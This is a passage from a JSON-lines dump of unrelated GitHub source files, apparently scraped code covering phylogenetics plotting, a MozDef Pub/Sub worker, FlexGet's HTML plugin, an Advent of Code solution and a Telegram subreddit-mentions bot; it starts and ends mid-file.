\",\"_\")+\"_SigmaObservedTips1_new3.txt\",\"w\")\n\t\tfor j in range(N):\n\t\t\tskip=False\n\t\t\t#print(j)\n\t\t\tsigmas=[]\n\t\t\tsigmas2=[]\n\t\t\tsigmas3=[]\n\t\t\tsigmas4=[]\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\"_ESS.txt\")\n\t\t\tline=file.readline()\n\t\t\tESS=int(line.replace(\"\\n\",\"\"))\n\t\t\tfile.close()\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j)+\".txt\")\n\t\t\tline=file.readline()\n\t\t\tlinelist=line.split()\n\t\t\twhile len(linelist)<3 or linelist[0]!=\"sample\":\n\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\tif line==\"\":\n\t\t\t\t\tskip=True\n\t\t\t\t\tbreak\n\t\t\tif skip:\n\t\t\t\tcontinue\n\t\t\tsigsqi=linelist.index(\"sigSq\")\n\t\t\tsigsqobsi=linelist.index(\"realsigsqroot\")\n\t\t\t#sigsqobs2i=linelist.index(\"realsigsqtips\")\n\t\t\tsigsqobs2i=linelist.index(\"realsigsqtipsbis\")\n\t\t\tsigsqobs3i=linelist.index(\"realsigsqtipster\")\n\t\t\tline=file.readline()\n\t\t\tcount=0\n\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\tlinelist=line.split()\n\t\t\t\tcount+=1\n\t\t\t\tif count%thinPhyrex==0:\n\t\t\t\t\tsigsq=float(linelist[sigsqi])\n\t\t\t\t\tsigsqobs=float(linelist[sigsqobsi])\n\t\t\t\t\tsigsqobs3=float(linelist[sigsqobs2i])\n\t\t\t\t\tsigsqobs4=float(linelist[sigsqobs3i])\n\t\t\t\t\tsigmas.append(sigsq)\n\t\t\t\t\tsigmas2.append(sigsqobs)\n\t\t\t\t\tsigmas3.append(sigsqobs3)\n\t\t\t\t\tsigmas4.append(sigsqobs4)\n\t\t\t\t\tfileSigma.write(str(sigsq))\n\t\t\t\t\tfileSigma2.write(str(sigsqobs))\n\t\t\t\t\tfileSigma3.write(str(sigsqobs3))\n\t\t\t\t\tfileSigma4.write(str(sigsqobs4))\n\t\t\t\t\tfileSigma.write(\"\\t\")\n\t\t\t\t\tfileSigma2.write(\"\\t\")\n\t\t\t\t\tfileSigma3.write(\"\\t\")\n\t\t\t\t\tfileSigma4.write(\"\\t\")\n\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\tfileSigman.write(str(sigsq))\n\t\t\t\t\t\tfileSigma2n.write(str(sigsqobs))\n\t\t\t\t\t\tfileSigma3n.write(str(sigsqobs3))\n\t\t\t\t\t\tfileSigma4n.write(str(sigsqobs4))\n\t\t\t\t\t\tfileSigman.write(\"\\t\")\n\t\t\t\t\t\tfileSigma2n.write(\"\\t\")\n\t\t\t\t\t\tfileSigma3n.write(\"\\t\")\n\t\t\t\t\t\tfileSigma4n.write(\"\\t\")\n\t\t\t\tline=file.readline()\n\t\t\tfileSigma.write(\"\\n\")\n\t\t\tfileSigma2.write(\"\\n\")\n\t\t\tfileSigma3.write(\"\\n\")\n\t\t\tfileSigma4.write(\"\\n\")\n\t\t\tif ESS==1:\n\t\t\t\tfileSigman.write(\"\\n\")\n\t\t\t\tfileSigma2n.write(\"\\n\")\n\t\t\t\tfileSigma3n.write(\"\\n\")\n\t\t\t\tfileSigma4n.write(\"\\n\")\n\t\t\tfile.close()\n\n\t\t\t#print(len(sigmas))\n\t\t\t#if len(sigmas)>100:\n\t\t\t#\tprint(str(numpy.percentile(sigmas, 2.5))+\" \"+str(numpy.percentile(sigmas, 50))+\" \"+str(numpy.percentile(sigmas, 97.5)))\n\t\t\t#\tprint(str(numpy.percentile(sigmas2, 2.5))+\" \"+str(numpy.percentile(sigmas2, 50))+\" \"+str(numpy.percentile(sigmas2, 97.5)))\n\t\t\t#\tprint(str(numpy.percentile(sigmas3, 2.5))+\" \"+str(numpy.percentile(sigmas3, 50))+\" \"+str(numpy.percentile(sigmas3, 97.5)))\n\t\t\t\t#print(str(numpy.percentile(treeLs, 2.5))+\" \"+str(numpy.percentile(treeLs, 50))+\" \"+str(numpy.percentile(treeLs, 97.5)))\n\t\t\t#else:\n\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\tfileSigma.close()\n\t\tfileSigma2.close()\n\t\tfileSigma3.close()\n\t\tfileSigma4.close()\n\t\tfileSigman.close()\n\t\tfileSigma2n.close()\n\t\tfileSigma3n.close()\n\t\tfileSigma4n.close()\n\t\t\n\t\t\nif ChangePhyrex:\n\tanalyses=[\"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\"]\n\tfoldersBEAST=[\"output/phyrex/LV/\",\"output/phyrex/LV/\"]\n\ttoSkip=[0,100]\n\tfor i in range(len(analyses)):\n\t\tfor j in range(N):\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_input/phyrex\"+str(j+toSkip[i])+\".xml\")\n\t\t\tfileNew=open(foldersBEAST[i]+\"phyrex_input/phyrex\"+str(j+toSkip[i])+\"_new.xml\",\"w\")\n\t\t\ttext=file.read()\n\t\t\t#print(line)\n\t\t\t#print(line.replace('mcmc.sample.every=\"1000\"','mcmc.sample.every=\"100\"'))\n\t\t\ttextNew=text.replace('mcmc.sample.every=\"1000\"','mcmc.sample.every=\"100\"').replace('mcmc.burnin=\"10000\"','mcmc.burnin=\"1000\"')\n\t\t\tfile.close()\n\t\t\tfileNew.write(textNew)\n\t\t\tfileNew.close()\n\t\n\t\n\t\n\t\n\t","repo_name":"AntanasKal/Phylogeography","sub_path":"python_scripts/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":20164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30082077971","text":"arr=[1,20,6,4,5]\r\ndef merge_sort(arr,n):\r\n\ttemp=[0]*n\r\n\treturn mergesort(arr,temp,0,len(arr)-1)\r\ndef mergesort(arr,temp,left,right):\t\t\t\t# MERGE SORT BASICS STEPS\r\n\tcount=0\r\n\tif left\r\n __global__ void relaxtionfun(double *signal, double *rela, double *sr, int length)\r\n {\r\n int x = blockIdx.x * blockDim.x + threadIdx.x;\r\n if (x '))\n\n#Initializing values\nr = 0.04\nportion_down_payment = 0.25\ntotal_cost = 1000000\ncost_down_payment = total_cost*portion_down_payment\ncurrent_savings = 0\nsemi_annual_raise = 0.07\ncounter = 1\nepsilon = 100\nhigh_guess = 10000\nlow_guess = 0\nmonthly_salary = annual_salary/12\nbisection = 1\nportion_saved = (high_guess + low_guess) / 2\n\n#Executing\nwhile (high_guess-low_guess) > 0:\n for i in range(1,37):\n if counter % 6 == 0:\n current_savings += current_savings*semi_annual_raise\n current_savings += monthly_salary*((portion_saved)/10000)\n current_savings += monthly_salary*r\n counter += 1\n if current_savings > (cost_down_payment+epsilon):\n high_guess = portion_saved\n print('high guess = portion saved')\n elif current_savings < (cost_down_payment-epsilon):\n low_guess = portion_saved\n print('low guess = portion saved')\n else:\n break\n bisection += 1\n current_savings = 0\n portion_saved = (high_guess + low_guess) / 2\n if portion_saved >= 10000:\n break\nportion_saved = portion_saved/10000\n\nif current_savings < (cost_down_payment-epsilon):\n print('It is impossible to pay down in 3 years')\nelse:\n print(f'Best savings rate {portion_saved}')\n print(f'Steps in bisection: {bisection}')\n\n\n","repo_name":"homebredcode/MIT-6.0001","sub_path":"Problem set 1/right amount v2.py","file_name":"right amount v2.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16934135255","text":"import json\nimport sys\nimport socket\nimport time\nfrom configlib import getConfig, OptionParser\nfrom datetime import datetime\nfrom mozdef_util.utilities.toUTC import toUTC\nfrom mozdef_util.utilities.logger import logger, initLogger\nfrom mozdef_util.elasticsearch_client import (\n ElasticsearchClient,\n ElasticsearchBadServer,\n ElasticsearchInvalidIndex,\n ElasticsearchException,\n)\nfrom google.cloud import pubsub\nfrom lib.plugins import sendEventToPlugins, registerPlugins\n\n# running under uwsgi?\ntry:\n import uwsgi\n\n hasUWSGI = True\nexcept ImportError as e:\n hasUWSGI = False\n\n\nclass PubSubtaskConsumer(object):\n def __init__(self, esConnection, options):\n self.esConnection = esConnection\n self.pluginList = registerPlugins()\n self.options = options\n self.scopes = [\"https://www.googleapis.com/auth/cloud-platform\", \"https://www.googleapis.com/auth/pubsub \"]\n self.credentials_file = options.credentials_file\n\n def run(self):\n # XXX: fetch from the config file\n subscriber = pubsub.SubscriberClient.from_service_account_file(self.options.credentials_file)\n res = subscriber.subscribe(self.options.resource_name, callback=self.onMessage)\n try:\n res.result()\n except Exception as e:\n logger.exception(e)\n logger.error(\n \"Received error during subscribing - killing self and my background thread in 5 seconds for uwsgi to bring me back\"\n )\n time.sleep(5)\n res.cancel()\n sys.exit(1)\n\n def onMessage(self, message):\n try:\n # default elastic search metadata for an event\n metadata = {\"index\": \"events\", \"id\": None}\n event = {}\n\n event[\"receivedtimestamp\"] = toUTC(datetime.now()).isoformat()\n event[\"mozdefhostname\"] = self.options.mozdefhostname\n\n event[\"details\"] = json.loads(message.data.decode(\"UTF-8\"))\n\n if \"tags\" in event[\"details\"]:\n event[\"tags\"] = event[\"details\"][\"tags\"].extend([self.options.resource_name])\n else:\n event[\"tags\"] = [self.options.resource_name]\n event[\"tags\"].extend([\"pubsub\"])\n\n (event, metadata) = sendEventToPlugins(event, metadata, self.pluginList)\n # Drop message if plugins set to None\n if event is None:\n message.ack()\n return\n self.save_event(event, metadata)\n message.ack()\n except Exception as e:\n logger.exception(e)\n logger.error(\"Malformed message: %r\" % message)\n message.ack()\n\n def save_event(self, event, metadata):\n try:\n # drop the message if a plug in set it to None\n # signaling a discard\n if event is None:\n return\n\n # make a json version for posting to elastic search\n jbody = json.JSONEncoder().encode(event)\n\n try:\n bulk = False\n if self.options.esbulksize != 0:\n bulk = True\n\n self.esConnection.save_event(index=metadata[\"index\"], doc_id=metadata[\"id\"], body=jbody, bulk=bulk)\n\n except (ElasticsearchBadServer, ElasticsearchInvalidIndex) as e:\n # handle loss of server or race condition with index rotation/creation/aliasing\n try:\n self.esConnection = esConnect()\n return\n except (ElasticsearchBadServer, ElasticsearchInvalidIndex, ElasticsearchException) as e:\n logger.exception(\"ElasticSearchException: {0} reported while indexing event\".format(e))\n return\n except ElasticsearchException as e:\n logger.exception(\"ElasticSearchException: {0} reported while indexing event\".format(e))\n logger.error(\"Malformed jbody: %r\" % jbody)\n return\n except Exception as e:\n logger.exception(e)\n logger.error(\"Malformed message: %r\" % event)\n\n\ndef esConnect():\n \"\"\"open or re-open a connection to elastic search\"\"\"\n return ElasticsearchClient((list(\"{0}\".format(s) for s in options.esservers)), options.esbulksize)\n\n\ndef initConfig():\n # capture the hostname\n options.mozdefhostname = getConfig(\"mozdefhostname\", socket.gethostname(), options.configfile)\n\n # elastic search options. set esbulksize to a non-zero value to enable bulk posting, set timeout to post no matter how many events after X seconds.\n options.esservers = list(getConfig(\"esservers\", \"http://localhost:9200\", options.configfile).split(\",\"))\n options.esbulksize = getConfig(\"esbulksize\", 0, options.configfile)\n options.esbulktimeout = getConfig(\"esbulktimeout\", 30, options.configfile)\n\n # GCP PubSub options\n options.resource_name = getConfig(\"resource_name\", \"\", options.configfile)\n options.credentials_file = getConfig(\"credentials_file\", \"\", options.configfile)\n\n options.mqprotocol = getConfig(\"mqprotocol\", \"pubsub\", options.configfile)\n\n\ndef main():\n if hasUWSGI:\n logger.info(\"started as uwsgi mule {0}\".format(uwsgi.mule_id()))\n else:\n logger.info(\"started without uwsgi\")\n\n if options.mqprotocol not in (\"pubsub\"):\n logger.error(\"Can only process pubsub queues, terminating\")\n sys.exit(1)\n\n # connect to GCP and consume our queue\n PubSubtaskConsumer(es, options).run()\n\n\nif __name__ == \"__main__\":\n # configure ourselves\n parser = OptionParser()\n parser.add_option(\n \"-c\", dest=\"configfile\", default=sys.argv[0].replace(\".py\", \".conf\"), help=\"configuration file to use\"\n )\n (options, args) = parser.parse_args()\n initConfig()\n initLogger(options)\n\n # open ES connection globally so we don't waste time opening it per message\n es = esConnect()\n\n main()\n try:\n main()\n except KeyboardInterrupt as e:\n logger.info(\"Exiting worker\")\n if options.esbulksize != 0:\n es.finish_bulk()\n except Exception as e:\n if options.esbulksize != 0:\n es.finish_bulk()\n raise\n","repo_name":"mozilla/MozDef","sub_path":"mq/esworker_pubsub.py","file_name":"esworker_pubsub.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"905148993","text":"from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\nfrom past.builtins import basestring\nfrom future.moves.urllib import parse\n\n\nimport logging\nimport posixpath\nimport zlib\nimport re\nimport io\n\nfrom jinja2 import Template\n\nfrom flexget import plugin\nfrom flexget.event import event\nfrom flexget.entry import Entry\nfrom flexget.utils.soup import get_soup\nfrom flexget.utils.cached_input import cached\n\nlog = logging.getLogger('html')\n\n\nclass InputHtml(object):\n \"\"\"\n Parses urls from html page. Usefull on sites which have direct download\n links of any type (mp3, jpg, torrent, ...).\n\n Many anime-fansubbers do not provide RSS-feed, this works well in many cases.\n\n Configuration expects url parameter.\n\n Note: This returns ALL links on url so you need to configure filters\n to match only to desired content.\n \"\"\"\n\n def validator(self):\n from flexget import validator\n root = validator.factory()\n root.accept('text')\n advanced = root.accept('dict')\n advanced.accept('url', key='url', required=True)\n advanced.accept('text', key='username')\n advanced.accept('text', key='password')\n advanced.accept('text', key='dump')\n advanced.accept('text', key='title_from')\n advanced.accept('boolean', key='allow_empty_links')\n regexps = advanced.accept('list', key='links_re')\n regexps.accept('regexp')\n advanced.accept('boolean', key='increment')\n increment = advanced.accept('dict', key='increment')\n increment.accept('integer', key='from')\n increment.accept('integer', key='to')\n increment.accept('text', key='name')\n increment.accept('integer', key='step')\n increment.accept('boolean', key='stop_when_empty')\n increment.accept('integer', key='entries_count')\n return root\n\n def build_config(self, config):\n\n def get_auth_from_url():\n \"\"\"Moves basic authentication from url to username and password fields\"\"\"\n parts = list(parse.urlsplit(config['url']))\n split = parts[1].split('@')\n if len(split) > 1:\n auth = split[0].split(':')\n if len(auth) == 2:\n config['username'], config['password'] = auth[0], auth[1]\n else:\n log.warning('Invalid basic authentication in url: %s' % config['url'])\n parts[1] = split[1]\n config['url'] = parse.urlunsplit(parts)\n\n if isinstance(config, basestring):\n config = {'url': config}\n get_auth_from_url()\n return config\n\n @cached('html')\n @plugin.internet(log)\n def on_task_input(self, task, config):\n config = self.build_config(config)\n\n auth = None\n if config.get('username') and config.get('password'):\n log.debug('Basic auth enabled. User: %s Password: %s' % (config['username'], config['password']))\n auth = (config['username'], config['password'])\n\n increment = config.get('increment')\n base_url = config['url']\n if increment:\n entries = None\n if not isinstance(increment, dict):\n increment = {}\n current = increment.get('from', 0)\n to = increment.get('to')\n step = increment.get('step', 1)\n base_url = config['url']\n entries_count = increment.get('entries_count', 500)\n stop_when_empty = increment.get('stop_when_empty', True)\n increment_name = increment.get('name', 'i')\n\n template_url = Template(base_url)\n template_dump = None\n if 'dump' in config:\n dump_name = config['dump']\n if dump_name:\n template_dump = Template(dump_name)\n\n while to is None or current < to:\n render_ctx = {increment_name: current}\n url = template_url.render(**render_ctx)\n dump_name = None\n if template_dump:\n dump_name = template_dump.render(**render_ctx)\n new_entries = self._request_url(task, config, url, auth, dump_name)\n if not entries:\n entries = new_entries\n else:\n entries.extend(new_entries)\n if stop_when_empty and not new_entries:\n break\n if entries_count and len(entries) >= entries_count:\n break\n current += step\n return entries\n else:\n return self._request_url(task, config, base_url, auth, dump_name=config.get('dump'))\n\n def _request_url(self, task, config, url, auth, dump_name=None):\n log.verbose('Requesting: %s' % url)\n page = task.requests.get(url, auth=auth)\n log.verbose('Response: %s (%s)' % (page.status_code, page.reason))\n soup = get_soup(page.content)\n\n # dump received content into a file\n if dump_name:\n log.verbose('Dumping: %s' % dump_name)\n data = soup.prettify()\n with io.open(dump_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n return self.create_entries(url, soup, config)\n\n def _title_from_link(self, link, log_link):\n title = link.text\n # longshot from next element (?)\n if not title:\n title = link.next.string\n if title is None:\n log.debug('longshot failed for %s' % log_link)\n return None\n return title or None\n\n def _title_from_url(self, url):\n parts = parse.urlsplit(url)\n name = ''\n if parts.scheme == 'magnet':\n match = re.search('(?:&dn(?:\\.\\d)?=)(.+?)(?:&)', parts.query)\n if match:\n name = match.group(1)\n else:\n name = posixpath.basename(parts.path)\n return parse.unquote_plus(name)\n\n def create_entries(self, page_url, soup, config):\n\n queue = []\n duplicates = {}\n duplicate_limit = 4\n\n def title_exists(title):\n \"\"\"Helper method. Return True if title is already added to entries\"\"\"\n for entry in queue:\n if entry['title'] == title:\n return True\n\n for link in soup.find_all('a'):\n # not a valid link\n if not link.has_attr('href'):\n continue\n # no content in the link\n if not link.contents and not config.get('allow_empty_links', False):\n continue\n\n url = link['href']\n # fix broken urls\n if url.startswith('//'):\n url = 'http:' + url\n elif not url.startswith('http://') or not url.startswith('https://'):\n url = parse.urljoin(page_url, url)\n\n log_link = url\n log_link = log_link.replace('\\n', '')\n log_link = log_link.replace('\\r', '')\n\n # get only links matching regexp\n regexps = config.get('links_re', None)\n if regexps:\n accept = False\n for regexp in regexps:\n if re.search(regexp, url):\n accept = True\n if not accept:\n log.debug('url does not match any \"links_re\": %s' % url)\n continue\n\n title_from = config.get('title_from', 'auto')\n if title_from == 'url':\n title = self._title_from_url(url)\n log.debug('title from url: %s' % title)\n elif title_from == 'title':\n if not link.has_attr('title'):\n log.warning('Link `%s` doesn\\'t have title attribute, ignored.' % log_link)\n continue\n title = link['title']\n log.debug('title from title: %s' % title)\n elif title_from == 'auto':\n title = self._title_from_link(link, log_link)\n if title is None:\n continue\n # automatic mode, check if title is unique\n # if there are too many duplicate titles, switch to title_from: url\n if title_exists(title):\n # ignore index links as a counter\n if 'index' in title and len(title) < 10:\n log.debug('ignored index title %s' % title)\n continue\n duplicates.setdefault(title, 0)\n duplicates[title] += 1\n if duplicates[title] > duplicate_limit:\n # if from url seems to be bad choice use title\n from_url = self._title_from_url(url)\n switch_to = 'url'\n for ext in ('.html', '.php'):\n if from_url.endswith(ext):\n switch_to = 'title'\n log.info('Link names seem to be useless, auto-configuring \\'title_from: %s\\'. '\n 'This may not work well, you might need to configure it yourself.' % switch_to)\n config['title_from'] = switch_to\n # start from the beginning ...\n return self.create_entries(page_url, soup, config)\n elif title_from == 'link' or title_from == 'contents':\n # link from link name\n title = self._title_from_link(link, log_link)\n if title is None:\n continue\n log.debug('title from link: %s' % title)\n else:\n raise plugin.PluginError('Unknown title_from value %s' % title_from)\n\n if not title:\n log.warning('title could not be determined for link %s' % log_link)\n continue\n\n # strip unicode white spaces\n title = title.replace(u'\\u200B', u'').strip()\n\n # in case the title contains xxxxxxx.torrent - foooo.torrent clean it a bit (get up to first .torrent)\n # TODO: hack\n if title.lower().find('.torrent') > 0:\n title = title[:title.lower().find('.torrent')]\n\n if title_exists(title):\n # title link should be unique, add CRC32 to end if it's not\n hash = zlib.crc32(url.encode(\"utf-8\"))\n crc32 = '%08X' % (hash & 0xFFFFFFFF)\n title = '%s [%s]' % (title, crc32)\n # truly duplicate, title + url crc already exists in queue\n if title_exists(title):\n continue\n log.debug('uniqued title to %s' % title)\n\n entry = Entry()\n entry['url'] = url\n entry['title'] = title\n\n if 'username' in config and 'password' in config:\n entry['download_auth'] = (config['username'], config['password'])\n\n queue.append(entry)\n\n # add from queue to task\n return queue\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(InputHtml, 'html', api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/input/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":11248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"55305237","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by panos on 11/29/18\n# IDE: PyCharm\n\nimport os\nimport shutil\nimport re\nfrom warnings import warn\nfrom subprocess import check_output\nimport time\n\n\nclass FileOperation:\n def merge_dir(self, old_dst, new_dst, middle_path=''):\n \"\"\"\n Move a directory to another directory\n :param old_dst: The directory to be moved\n :param new_dst: The directory to move to\n :param middle_path: neglect\n :return:\n \"\"\"\n # determine whether if the old_dst is a directory or a file or not exists.\n if os.path.exists(old_dst):\n if os.path.isdir(old_dst):\n os.makedirs(new_dst, exist_ok=True)\n for ele in os.listdir(old_dst):\n ele_path = os.path.join(old_dst, ele)\n joined_middle_path = os.path.join(middle_path, ele)\n self.merge_dir(ele_path, new_dst, middle_path=joined_middle_path)\n elif os.path.isfile(old_dst):\n new_dst_path = os.path.join(new_dst, middle_path)\n os.makedirs(os.path.split(new_dst_path)[0], exist_ok=True)\n shutil.move(old_dst, new_dst_path)\n return True\n else:\n return False\n\n def read_status(self, path=None, simulate=True):\n \"\"\"\n Check the upload program status\n :param path: The path to call the upload program\n :param simulate: If True, the upload program will not be called.\n The result turns out to be True on defult\n :return: Boolean, True meaning that the upload program is ready to upload\n \"\"\"\n if simulate:\n res =\"\"\"-------------- job stats ---------------\n ---------------- job stat ------------------\n JobName:local_test\n JobState:Running\n PendingTasks:0\n DispatchedTasks:0\n RunningTasks:0\n SucceedTasks:541\n FailedTasks:0\n ScanFinished:false\n RunningTasks Progress:\n ----------------------------------------\n \"\"\"\n status = res\n else:\n res = check_output(['console', 'stat'], cwd=path, shell=True)\n status = res.decode()\n try:\n if 'no jobs is running' in status:\n return True\n JobStatus = re.compile('JobState:(.*?)\\s').search(status).group(1)\n PendingTasks = int(re.compile('PendingTasks:(.*?)\\s').search(status).group(1))\n RunningTasks = int(re.compile('RunningTasks:(.*?)\\s').search(status).group(1))\n FailedTasks = int(re.compile('FailedTasks:(.*?)\\s').search(status).group(1))\n DispatchedTasks = int(re.compile('DispatchedTasks:(.*?)\\s').search(status).group(1))\n except AttributeError:\n time.sleep(1)\n return self.read_status(path)\n if PendingTasks == RunningTasks == FailedTasks == DispatchedTasks == 0 and JobStatus == 'Running':\n return True\n else:\n warn('The uploading program is not avaliable now')\n return False\n","repo_name":"panoslin/DouYinSpider","sub_path":"douyin_feed_api/feed_api/integratedos.py","file_name":"integratedos.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"61"} +{"seq_id":"9506636380","text":"from day10 import get_data_as_ascii, get_knot_hash\nprint(\"(ignore above numbers (from day 10))\")\n\nINPUT = \"nbysizxe\"\n\n#\n#\tPart 1\n#\n\n# returns hexadecimal value in binary\ndef get_hex_as_binary(hexval):\n\t# 4 binary digits per 1 hexadecimal digit\n\tlength = len(hexval) * 4\n\tbinary = bin(int(hexval, 16))[2:]\n\n\t# add leading (padding) 0's\n\twhile ((len(binary)) < length):\n\t\tbinary = '0' + binary\n\n\treturn binary\n\n# returns the number of cells used\ndef get_used_count(key_string):\n\tcount = 0\n\n\t# for each row in disk,\n\tfor i in range(0,128):\n\t\t# hash the input, count the 1's\t\n\t\thash_input = key_string + \"-\" + str(i)\n\t\tknot_hash = get_knot_hash(get_data_as_ascii(hash_input))\n\t\tcount += get_hex_as_binary(knot_hash).count(\"1\")\n\t\n\treturn count\n\nused_count = get_used_count(INPUT)\nprint(used_count)\n\n#\n#\tPart 2\n#\n\n# returns the disk (128x128 grid)\ndef generate_disk(key_string):\n\tdisk = []\n\n\t# generate each row one by one\n\tfor i in range(0, 128):\n\t\thash_input = key_string + \"-\" + str(i)\n\t\tknot_hash = get_knot_hash(get_data_as_ascii(hash_input))\n\t\tdisk.append(list(map(int, list(get_hex_as_binary(knot_hash)))))\n\n\treturn disk\n\n# translates a coordinate into a formatted string - \"x:y\"\ndef hash_cell(x, y):\n\treturn str(x) + \":\" + str(y)\n\nclass DepthFirstSearch2D():\n\t'custom Depth First Search algorithm for 2d grids'\n\n\tdef __init__(self, grid, x, y):\n\t\tself.visited = []\n\t\tself.grid = grid\n\t\tself.visit(x, y)\n\t\n\t# marks the specified cell as 'visited', then 'visits' all connecting cells\n\t# connected cells == cells up/down/left/right\n\tdef visit(self, x, y):\n\t\t# don't retrace steps\n\t\tif hash_cell(x, y) in self.visited:\n\t\t\treturn\n\n\t\t# make sure coordinates are within bounds\n\t\tif y < 0 or y >= len(self.grid) or x < 0 or x >= len(self.grid[y]):\n\t\t\treturn\n\n\t\t# count cell as visited if cell has value of '1', otherwise stop\n\t\tif self.grid[y][x] == 1:\n\t\t\tself.visited.append(hash_cell(x, y))\n\t\telse:\n\t\t\treturn\n\n\t\t# visit all surrounding (up/down/left/right) cells\n\t\tself.visit(x-1, y)\n\t\tself.visit(x+1, y)\n\t\tself.visit(x, y-1)\n\t\tself.visit(x, y+1)\n\n# returns the number of regions within the disk\ndef get_region_count(disk):\n\tregions = []\n\n\t# cycle through every \n\tfor y in range(0, 128):\n\t\tfor x in range(0, 128):\n\t\t\t# check if cell is already within a region\n\t\t\tfound = False\n\t\t\tcell_hash = hash_cell(x, y)\n\t\t\tfor region in regions:\n\t\t\t\tif cell_hash in region:\n\t\t\t\t\tfound = True\n\n\t\t\t# if cell not already found within existing regions,\n\t\t\tif not found:\n\t\t\t\t# generate it's region\n\t\t\t\tdfs2d = DepthFirstSearch2D(disk, x, y)\n\n\t\t\t\t# only add regions that actually contain cells (lol I'm dumb)\n\t\t\t\tif len(dfs2d.visited) > 0:\n\t\t\t\t\tregions.append(dfs2d.visited)\n\n\treturn len(regions)\n\nregion_count = get_region_count(generate_disk(INPUT))\nprint(region_count)\n","repo_name":"goddtriffin/AdventOfCode-2017","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12564779078","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nfrom .data.config import Config, Fomal_subs\nfrom .fomal_bot_db import Db_looker\nimport os\nimport datetime\nimport logging\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef top(num : int, sub : str):\n '''Gets latest data from the db and sends the message to the user'''\n db = Db_looker()\n db.connect_db()\n\n num = int(num)\n\n if not sub in Fomal_subs.subs:\n ret = \"At the moment only {} are supported\".format(Fomal_subs.subs)\n return ret\n\n if num <= 0 or num > 100:\n ret = \"\"\"I only can show you a top 1-100, \n second argument must be between those values\"\"\"\n return ret\n\n if db.has_worked(): \n pd_mentions = db.fetch_top_db(forum = sub, top = num) \n \n else:\n ret= \"Data is not ready yet, try again in some minutes\"\n return ret\n \n output = ''\n for index, row in pd_mentions.iterrows():\n output += '{symbol}: {mentions}\\n'.format(symbol=row[0], mentions=row[1])\n\n db.disconnect_db()\n if len(output) == 0:\n ret= \"Data is not ready yet, try again in some minutes\"\n return ret\n return output\n\ndef top_set(context : CallbackContext):\n context.bot.send_message(top(context.args[3], context.args[4]),chat_id=context.job.context)\n\ndef top_one(update : Update, context : CallbackContext):\n if not len(context.args) == 2:\n update.message.reply_text(\"Only two parameters should be passed\")\n return\n update.message.reply_text(top(context.args[0], context.args[1]))\n\ndef remove_job_if_exists(update, context) -> bool:\n \"\"\"Remove job with given name. Returns whether job was removed.\"\"\"\n curent_jobs = context.job_queue.jobs()\n if not curent_jobs:\n return False\n for job in curent_jobs:\n job.schedule_removal()\n return True\n\ndef stupid_hello(context):\n '''Debugging'''\n job = context.job\n context.bot.send_message(chat_id=job.context ,text='Hello World')\n\n\n# Define a few command handlers. These usually take the two arguments update and\n# context. Error handlers also receive the raised TelegramError object in error.\ndef set_timer(update: Update, context: CallbackContext):\n \"\"\"Send a message when the command /set_timer is issued, order of args: interval, start, finish, top_num, sub.\"\"\"\n if not len(context.args) == 5:\n update.message.reply_text('You need to introduce 5 arguments, interval, start_hour, finish_hour, top_num, Subreddit')\n update.message.reply_text('For example: /set_timer 30 9 22 10 SatoshiStreetBets')\n update.message.reply_text('Would call the bot every 30 minutes, from 9 to 22 hours, to give you a top_ten from SatoshiStreetBets')\n return\n interval = int(context.args)[0]\n start = int(context.args)[1]\n finish = int(context.args)[2]\n top_num = int(context.args)[3]\n sub = context.args[4]\n \n for i in range(2):\n if int(context.args[i]) <= 0:\n update.message.reply_text('We do not support going back in time, yet')\n update.message.reply_text('Try with positive numbers')\n return\n\n if start == 24:\n start = 0\n \n if start >= finish:\n update.message.reply_text('The starting hour goes before the finish hour: interval start finish')\n update.message.reply_text('If you meant it that way... not implemented yet')\n return\n\n if not 1 <= interval <= 1440:\n update.message.reply_text('Interval not valid')\n return\n for i in range(2)[1:]:\n if not 0 <= int(context.args[i]) <= 24:\n update.message.reply_text('Hour not valid, must be 0-24')\n return\n if top_num <= 0 or top_num > 50:\n update.message.reply_text('Top_{} too much, only 0-50 available', top_num)\n return\n\n if sub not in Fomal_subs.subs:\n update.message.reply_text('Sorry we do not support {}, only {} are available at the moment', sub, Fomal_subs.subs)\n return\n\n update.message.reply_text('Hi! setting timer')\n job_removed = remove_job_if_exists(update, context)\n \n now = datetime.datetime.now()\n first = datetime.datetime(year=now.year, month=now.month,\n day=now.day, hour=int(start),\n minute=0, second=0, tzinfo=now.tzinfo)\n last = datetime.datetime(year=now.year, month=now.month,\n day=now.day, hour=int(finish),\n minute=0, second=0, tzinfo=now.tzinfo) 